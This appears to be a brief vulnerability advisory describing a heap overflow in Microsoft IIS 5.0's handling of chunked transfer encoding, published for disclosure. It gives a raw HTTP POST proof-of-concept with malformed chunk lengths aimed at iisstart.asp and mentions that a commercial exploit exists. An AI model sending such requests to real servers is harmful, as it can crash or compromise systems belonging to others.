|
Microsoft IIS Chunked Encoding Transfer Heap Overflow Vulnerability
The following proof-of-concept may be used to reproduce this condition using a utility such as telnet or netcat: **************Begin Session**************** POST /iisstart.asp HTTP/1.1 Accept: */* Host: eeye.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 10 PADPADPADPADPADP 4 DATA 4 DEST 0 [enter] [enter] **************End Session****************** This example uses the iisstart.asp script that ships with Microsoft IIS 5.0. CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. |
|
|
Privacy Statement |
